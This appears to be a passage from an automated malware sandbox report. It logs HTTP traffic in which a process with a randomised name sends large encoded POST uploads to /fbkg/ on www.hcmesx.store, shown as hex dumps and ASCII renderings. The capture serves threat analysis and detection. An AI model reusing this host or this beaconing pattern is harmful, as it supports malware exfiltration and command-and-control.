                                                                                                                                                                                                Nov 17, 2023 19:31:56.925251961 CET1333OUTData Raw: 77 48 36 45 47 39 76 57 6b 39 4f 50 33 69 38 37 6a 4a 2b 6d 6f 79 48 75 35 4f 56 33 4d 76 6c 42 34 6b 69 75 31 2f 62 5a 74 54 65 47 4d 6e 48 6d 65 48 63 6d 4b 67 54 2f 58 4a 6e 66 71 46 31 51 4a 6c 46 6c 47 5a 2b 53 71 38 31 76 67 42 2f 6b 44 62
                                                                                                                                                                                                Data Ascii: wH6EG9vWk9OP3i87jJ+moyHu5OV3MvlB4kiu1/bZtTeGMnHmeHcmKgT/XJnfqF1QJlFlGZ+Sq81vgB/kDbniGb9ZFdBoV2o/bFPv1GIRo4TDBE/V1Tm0kVr3qacNmL+73B3MNWpdi0+9rZDrP6dMIoKswT6age4oTVkLUCP+PRob//fv6xua3o67GEeEafn5UlUk2vA/INd7/LoWDmyh7Nmx7SdV+dXoYrzPEP4bjnI7RTCaM26
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925431013 CET1339OUTData Raw: 58 34 39 78 74 37 49 30 75 58 2b 69 61 6c 4c 2b 48 4d 76 73 71 64 72 68 64 48 45 61 4c 41 46 2b 4d 53 4e 71 67 46 6f 33 50 58 36 73 73 43 4a 71 69 62 33 36 35 78 44 4e 53 4a 32 41 51 70 72 2f 64 72 59 35 4d 75 62 61 42 42 31 77 62 66 52 55 42 33
                                                                                                                                                                                                Data Ascii: X49xt7I0uX+ialL+HMvsqdrhdHEaLAF+MSNqgFo3PX6ssCJqib365xDNSJ2AQpr/drY5MubaBB1wbfRUB3cJZNORyUN+ntE3iIDaXS3+1Yp9QQRHW8GdZcbOEbGMBgcKIlQLX7X164/y6vb2rkuMG6oK/JL4KSpgmdHtykQK1JTjoB0saNcP/UuJoADL3iSDSHrGtBkyAYUvS5i9D2gS+qym/5+3m77uaa2ouKBUX9nH+qP6CPZ
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925539017 CET1343OUTData Raw: 7a 69 41 51 54 45 4a 4a 65 6b 69 4e 48 58 66 77 74 71 55 45 52 30 6e 41 54 2f 46 52 74 54 37 6f 67 68 79 7a 71 6f 39 58 6c 73 59 52 78 69 41 69 38 61 51 79 52 4b 43 51 5a 42 6c 33 50 76 39 41 49 50 37 6d 30 4c 7a 54 75 74 36 39 32 50 43 72 4a 58
                                                                                                                                                                                                Data Ascii: ziAQTEJJekiNHXfwtqUER0nAT/FRtT7oghyzqo9XlsYRxiAi8aQyRKCQZBl3Pv9AIP7m0LzTut692PCrJX+i+3g+830pNYJYdFJ/HfY8g7JJOtr6pGuSkDx0EW23zfg4rVTKhoP923JkbC/Qab5d8Twe8C4CVZFu3jT8VvD5Z65DHPwI3eYpr1neTYwHAOtBteJj2TsJujvtFqdvJhS4CtLzmoJ08QeJkJNKaOKM/jC1vgsJxO7
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091309071 CET1345OUTData Raw: 6a 31 65 58 70 46 53 55 4a 66 69 56 70 54 77 78 5a 52 34 50 70 36 34 52 58 6e 44 39 6d 39 39 48 5a 73 56 54 32 77 54 56 52 68 4b 42 6f 72 78 2f 56 5a 34 34 31 4e 4c 4f 41 45 79 35 61 65 31 47 69 36 59 6b 53 58 37 2b 30 57 68 4e 79 6e 53 4a 33 69
                                                                                                                                                                                                Data Ascii: j1eXpFSUJfiVpTwxZR4Pp64RXnD9m99HZsVT2wTVRhKBorx/VZ441NLOAEy5ae1Gi6YkSX7+0WhNynSJ3iycP/pxmin/qvKwy5tIe0Nk/+YWtmfrbW797OyprzOYO+W3PXJYMpHZDwHClUYiJg89s56R2CcyNSswjJjMaSJjwQcfAnzmCVGzCULUWtT/ASBY07pY2Lz22zusoRT5Y1GlzJXhacPNWerMAgRnmCeIKVtKFADXjAO
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091490984 CET1348OUTData Raw: 56 75 68 67 43 61 4e 46 56 6d 72 59 44 6c 76 42 34 53 2b 50 41 4b 2b 78 6b 4a 73 47 48 45 70 57 59 38 6e 48 59 51 31 6f 74 6b 4e 53 68 51 77 47 6d 76 72 6a 30 58 38 61 32 46 43 42 79 66 7a 55 47 36 52 34 49 52 43 31 73 41 41 30 44 2f 52 4a 32 67
                                                                                                                                                                                                Data Ascii: VuhgCaNFVmrYDlvB4S+PAK+xkJsGHEpWY8nHYQ1otkNShQwGmvrj0X8a2FCByfzUG6R4IRC1sAA0D/RJ2gPwOPy35H0wq8GSI7ewjs2WIwl3o8ldBBu8eS7DNYUeuk0dCgjFssvAIFLBOfkOa75sAu+nGNeZ/Oc8tsUaMy7JffMUhDuNYg7sK15JFEn+k2WrZgWTuboZDy2LeA2WrydDqdmiUtQKrR3wai4SlWwA4VCK5wOAIcd
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091660976 CET1356OUTData Raw: 50 64 47 41 67 54 4e 37 61 51 51 50 46 30 7a 43 39 66 6b 58 52 68 42 71 56 6a 73 50 78 48 62 64 44 57 73 52 78 73 2b 69 71 56 37 33 69 59 73 4f 52 74 58 30 77 31 52 69 78 4d 31 64 69 34 2b 71 6f 41 38 39 41 34 44 7a 54 4a 37 4d 4b 38 59 42 32 57
                                                                                                                                                                                                Data Ascii: PdGAgTN7aQQPF0zC9fkXRhBqVjsPxHbdDWsRxs+iqV73iYsORtX0w1RixM1di4+qoA89A4DzTJ7MK8YB2WqSEuc3l14e1sfxgeu8wkuJz/QVrpI81Onp5beUS+Qt8C3l1luBdIDqE0+zYo7ABGIez50XUSyYh+8/T9crOzLUKZgUPZLfhcooFtYA97WCgUUwl+BQu7K30kB/8afDZ/nLQywTBZpoaCV3Rv0ekwQpoQfXmbpeKg2
                                                                                                                                                                                                Nov 17, 2023 19:31:57.259959936 CET1360INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:31:57 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                66192.168.11.205019338.59.48.8680C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:56.758397102 CET1310OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.hcmesx.store
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.hcmesx.store
                                                                                                                                                                                                Referer: http://www.hcmesx.store/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 73 6e 65 31 38 33 7a 70 35 41 69 7a 68 6d 30 66 37 5a 39 34 32 35 67 68 4b 58 5a 72 73 35 47 36 67 73 77 48 49 5a 68 4a 65 4d 7a 39 6e 2b 6f 72 73 55 4a 39 68 42 36 4a 75 4e 68 6a 35 75 68 56 51 61 67 64 41 6a 51 34 54 6c 59 67 37 36 77 76 36 65 55 6e 6c 73 49 62 4e 54 48 66 52 70 52 4d 71 54 30 66 2f 73 39 75 59 51 6e 2b 6a 59 31 78 30 30 38 6d 4c 4e 43 75 41 77 68 65 79 50 33 67 38 47 4c 73 72 41 70 61 2b 54 39 4d 5a 58 76 6d 45 69 44 53 2f 74 50 77 73 58 71 59 52 4a 6c 7a 53 74 76 65 4b 32 72 6e 41 5a 41 37 4d 4e 48 52 6d 6e 78 32 78 73 44 35 63 75 6b 73 78 66 63 37 67 6a 6d 79 73 4e 72 79 45 58 55 52 6c 68 61 47 58 68 74 4f 76 39 52 56 5a 77 62 54 79 59 2f 65 71 6d 6b 55 6a 54 5a 69 69 35 6b 2f 47 74 52 67 66 75 39 65 4b 4f 77 5a 6a 63 44 65 65 59 43 59 6a 79 43 71 6d 6e 39 72 46 64 4c 33 35 57 4a 55 64 68 74 6b 58 68 71 32 52 66 2b 49 7a 64 51 42 4a 79 66 52 77 78 62 4c 4c 6e 2b 6e 68 2b 42 57 76 59 70 43 75 4a 42 4f 62 30 57 70 42 70 35 71 33 54 39 5a 5a 59 46 4d 6e 2f 38 78 66 68 4b 35 75 76 4c 59 70 42 2b 78 62 6b 54 59 74 5a 33 6b 34 71 6b 73 31 6f 73 30 6a 78 38 2b 78 70 4a 6b 42 50 62 2b 46 56 64 4e 58 6d 4d 64 79 49 67 4f 4e 77 52 69 5a 2b 6f 66 4c 65 6c 34 53 57 52 46 6f 57 58 4b 63 43 64 75 47 79 61 42 75 53 4e 32 59 36 48 2b 4e 54 69 38 31 63 6a 36 33 4b 2f 31 42 73 41 39 38 52 42 68 6c 33 6f 44 66 34 47 6d 41 34 70 52 52 43 37 50 54 67 6d 6d 72 6c 42 77 54 77 46 4b 33 70 54 6b 69 6d 6b 63 76 75 65 4d 64 37 47 6b 76 57 4c 7a 73 33 4c 45 67 31 4c 51 56 6e 2f 6b 30 71 31 2f 4e 64 4d 55 31 65 32 73 47 58 74 37 66 6c 43 6d 62 36 34 38 42 41 45 69 59 65 6f 77 6a 6b 31 57 58 48 4d 32 38 32 61 63 51 47 4e 73 6c 66 6a 2b 66 35 4a 6f 53 36 6b 4d 6f 68 75 78 74 61 76 6c 56 52 59 38 69 6e 43 32 42 4a 59 68 69 4e 57 65 65 48 37 31 78 4b 63 48 56 39 79 77 42 6c 42 44 45 33 4b 55 37 78 61 67 69 4b 2f 2b 64 35 54 30 4a 2f 58 50 4c 73 61 5a 69 43 4b 64 66 4c 66 48 77 66 58 67 63 72 70 35 63 41 47 67 55 6f 34 46 54 4b 75 7a 56 2b 4c 64 59 6a 52 75 75 69 73 68 71 30 47 49 4f 36 68 52 30 36 36 7a 6b 4a 78 48 6f 31 71 31 55 76 73 6e 77 5a 31 6e 33 55 47 38 61 39 7a 2f 50 6c 44 6e 79 4d 6d 75 53 55 4c 41 7a 64 45 53 76 69 5a 48 70 72 51 75 6a 34 34 36 74 44 7a 77 45 68 64 6e 4e 51 31 57 79 71 55 44 78 76 67 6e 61 78 6c 79 5a 4d 34 2f 4f 73 62 48 66 2f 72 77 58 42 57 59 51 52 49 38 45 67 54 5a 30 4b 4a 48 76 53 66 46 66 44 5a 4e 45 36 58 50 58 39 67 49 38 57 50 69 6b 6d 63 4f 63 32 6f 4d 6b 2f 50 62 75 68 42 72 58 51 61 63 52 4b 45 58 68 35 61 63 6b 6d 73 44 4a 69 78 30 2b 70 7a 2b 44 79 71 39 6f 31 56 45 2b 67 52 36 79 78 6c 62 50 6c 35 71 4f 35 4c 48 32 66 58 4d 71 64 34 5a 55 36 7a 6c 4d 75 73 38 38 45 72 59 73 6b 69 37 69 5a 64 6f 53 36 78 46 4c 72 6b 76 6e 2f 43 59 43 66 75 4d 79 64 66 52 55 5a 6b 56 4e 77 70 35 6a 39 57 48 2f 52 48 56 6b 36 74 64 6e 77 49 43 70 53 54 69 49 4f 4e 30 34 72 36 74 64 38 76 6e 42 5a 4e 4f 42 57 74 79 42 6a 4f 69 65 77 4c 65 72 4c 2f 76 39 6d 35 7a 6e 6f 32 30 68 38 67 34 6a 46 68 57 39 61 67 6b 30 46 67 73 34 30 4b 42 55 66 5a 52 50 61 78 6b 50 75 4c 69 63 7a 58 34 76 39 32 33 45 41 45 6b 55 61 45 42 5a 4f 45 65 58 58 61 52 52 6f 44 32 67 75 6b 4f 6c 52 42 30 53 57 5a 68 69 36 6c 38 38 4b 4c 2b 50 7a 77 50 7a 5a 49 65 54 47 73 71 54 55 33 56 61 38 61 73 31 6f 79 54 78 78 70 55 31 39 4c 49 4e 6e 76 41 44 41 77 71 66 34 68 58 46 49 79 35 52 2b 59 33 6a 52 30 71 48 79 55 44 30 66 74 56 42 36 32 56 2f 55 70 69 39 57 31 79 75 37 30 63 78 78 32 67 68 71 73 77 4d 54 50 44 38 73 61 51 64 41 72 52 6e 71 7a 69 76 4a 41 2b 53 53 70 50 32 4e 57 54 71 5a 46 66 35 4b 4e 56 49 44 51 6b 64 59 4b 42 4f 62 2b 35 38 6f 68 49 31 53 2b 6c 66 68 37 4b 4e 31 6b 33 67 73 76 4a 47 69 64 6a 4a 37 6f 69 75 50 70 59 4c 73 52 6d 64 51 68 4e 71 4d 30 59 32 66 70 39 47 6e 7a 39 36 48 7a 68 66 46 52 32 49 74 43 43 34 2b 32 79 4f 2b 63 38 51 30 4c 44 65 66 4a 51 7a 55 43 6d 61 6e 67 6b 52 4a 61 37 30 63 6a 34 4e 46 59 43 39 75 4b 4e 55 5a 62 35 43 51 4f 6a 58 6f 57 37 38 55 5a 77 6b 46 6d 77 6b 6e 51 54 44 37 4f 4a 6e 37 75 74 77 6e 4d 30 2b 74 74 30 4f 49 4c 70 63 67 4b 57 47 68 56 70 53 59 45 54 35 2b
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:31:56.758477926 CET1317OUTData Raw: 38 43 52 49 38 58 56 6b 47 42 47 30 6e 5a 35 37 55 6f 2b 55 4e 61 68 65 45 57 36 46 52 2f 67 4f 4a 34 35 54 52 6f 44 4d 4f 47 70 6e 6d 70 43 75 68 37 74 39 6d 2b 45 78 69 6a 50 65 54 59 41 43 56 64 6e 79 43 36 78 6a 74 42 42 45 31 44 39 38 57 36
                                                                                                                                                                                                Data Ascii: 8CRI8XVkGBG0nZ57Uo+UNaheEW6FR/gOJ45TRoDMOGpnmpCuh7t9m+ExijPeTYACVdnyC6xjtBBE1D98W6/Ihon+tT37R2yrWqIDlIJfF19ltXszpfz3YKc+N1vNEDxgH5EfR6JejtdKuhQrNbstFvO3SLTsbg9+J4WeQ0eUI8+WgqnktpP16kkcf96U+3h05Xiy3lFcZw/IyBGstDGzjz+AlYPoaHKCeulzB1Dz9d6P5TSU7q4
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924401045 CET1322OUTData Raw: 4d 31 4d 2b 68 63 46 7a 65 62 58 4e 51 79 6a 31 57 31 51 35 62 30 51 4f 46 6a 71 63 63 71 7a 37 45 38 65 6d 66 6f 78 31 6c 6e 30 48 37 53 69 71 7a 35 37 50 66 71 50 63 79 4d 49 36 35 2f 74 37 77 4d 59 4a 4e 79 6c 6c 74 35 58 33 37 6b 59 2b 4e 4e
                                                                                                                                                                                                Data Ascii: M1M+hcFzebXNQyj1W1Q5b0QOFjqccqz7E8emfox1ln0H7Siqz57PfqPcyMI65/t7wMYJNyllt5X37kY+NNv07jClbKc7SLsRwMK85BtdxjYZsczKFWBmZ8eZcGQVyiUw20j62q3qk361bAAXM4kmE8yp7BxwrPfSJOeCJYIVIHMixaaIh/TlVCivpvV6foQ2ykZDNFG346w2bVLjMGawFRBVQqjaVQQRPcJHPQDPmXp6HxG2Ayv
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924521923 CET1325OUTData Raw: 2f 73 69 65 2f 43 36 69 59 35 72 68 36 6b 55 65 4b 58 66 70 64 56 46 4b 64 4d 4b 39 64 69 61 43 51 35 46 6e 50 70 65 69 74 76 38 4e 6a 70 52 41 79 77 39 50 34 66 44 56 51 43 4c 51 73 2f 4d 33 35 4b 39 6b 61 32 74 36 74 79 50 71 41 54 6f 47 34 56
                                                                                                                                                                                                Data Ascii: /sie/C6iY5rh6kUeKXfpdVFKdMK9diaCQ5FnPpeitv8NjpRAyw9P4fDVQCLQs/M35K9ka2t6tyPqAToG4VEAxCsomRD7Bi7qizt2/L/vZk7/TGOB+pcoNVSXZUqwxFvzyUZDCjY8IUbUeMhuRgcbPLEsL5Ykg8TyVeOeOQdhv1/ywyCmJFlpQN2yxJmk1mYF++3OolUzRG+Qr2HWGHKJO7KV8v9xVKKQCsr8ARZnymFGbTRLoTb
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924904108 CET1327OUTData Raw: 5a 2f 4e 53 56 7a 32 51 4f 57 48 4a 71 74 33 2f 47 6a 71 54 71 55 6f 36 57 33 77 42 62 41 52 56 49 6e 6a 32 73 61 63 70 79 76 53 67 63 79 48 68 4b 49 79 75 59 6b 67 69 6c 4a 37 6d 42 43 75 72 4c 4e 37 4a 57 61 43 52 2f 58 56 30 4d 72 76 31 6e 67
                                                                                                                                                                                                Data Ascii: Z/NSVz2QOWHJqt3/GjqTqUo6W3wBbARVInj2sacpyvSgcyHhKIyuYkgilJ7mBCurLN7JWaCR/XV0Mrv1ngVCvqZFt2yO919b3CYqK5a9eFCf34j6oxlmn+eVBvVWVhiVoCnn+WwUDy+OL0p3twXeiUcHVXLf5a8bvwNgCj/EcJppD16PVGgEQ1XEF5D/1tkJAyFAYNjarT2ORRdL/LhLHypkrTOcNivsPiHOQjVS+i/lJkQDjK+
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925251961 CET1333OUTData Raw: 77 48 36 45 47 39 76 57 6b 39 4f 50 33 69 38 37 6a 4a 2b 6d 6f 79 48 75 35 4f 56 33 4d 76 6c 42 34 6b 69 75 31 2f 62 5a 74 54 65 47 4d 6e 48 6d 65 48 63 6d 4b 67 54 2f 58 4a 6e 66 71 46 31 51 4a 6c 46 6c 47 5a 2b 53 71 38 31 76 67 42 2f 6b 44 62
                                                                                                                                                                                                Data Ascii: wH6EG9vWk9OP3i87jJ+moyHu5OV3MvlB4kiu1/bZtTeGMnHmeHcmKgT/XJnfqF1QJlFlGZ+Sq81vgB/kDbniGb9ZFdBoV2o/bFPv1GIRo4TDBE/V1Tm0kVr3qacNmL+73B3MNWpdi0+9rZDrP6dMIoKswT6age4oTVkLUCP+PRob//fv6xua3o67GEeEafn5UlUk2vA/INd7/LoWDmyh7Nmx7SdV+dXoYrzPEP4bjnI7RTCaM26
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925431013 CET1339OUTData Raw: 58 34 39 78 74 37 49 30 75 58 2b 69 61 6c 4c 2b 48 4d 76 73 71 64 72 68 64 48 45 61 4c 41 46 2b 4d 53 4e 71 67 46 6f 33 50 58 36 73 73 43 4a 71 69 62 33 36 35 78 44 4e 53 4a 32 41 51 70 72 2f 64 72 59 35 4d 75 62 61 42 42 31 77 62 66 52 55 42 33
                                                                                                                                                                                                Data Ascii: X49xt7I0uX+ialL+HMvsqdrhdHEaLAF+MSNqgFo3PX6ssCJqib365xDNSJ2AQpr/drY5MubaBB1wbfRUB3cJZNORyUN+ntE3iIDaXS3+1Yp9QQRHW8GdZcbOEbGMBgcKIlQLX7X164/y6vb2rkuMG6oK/JL4KSpgmdHtykQK1JTjoB0saNcP/UuJoADL3iSDSHrGtBkyAYUvS5i9D2gS+qym/5+3m77uaa2ouKBUX9nH+qP6CPZ
